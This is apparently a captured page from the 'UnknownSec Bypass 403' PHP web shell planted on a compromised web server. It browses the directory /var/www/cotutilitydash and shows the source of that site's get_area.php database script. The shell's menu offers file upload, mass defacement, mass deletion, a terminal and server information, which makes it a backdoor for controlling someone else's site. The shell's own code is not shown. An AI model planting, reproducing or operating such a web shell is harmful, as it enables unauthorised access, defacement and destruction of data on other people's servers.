UnknownSec Bypass
403
:
/
var
/
www
/
cotutilitydash
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
get_area.php
<?php require_once "config.php"; $query=mysqli_query($conn,"SELECT * FROM mastertb where identifier='1' and isdeleted='".$gnotdeleted."'"); while($row=mysqli_fetch_array($query)) { $result[] = array( 'tid' => $row['id'], 'tname' => $row['area'], ); } echo json_encode($result); ?>
Copyright © 2025 - UnknownSec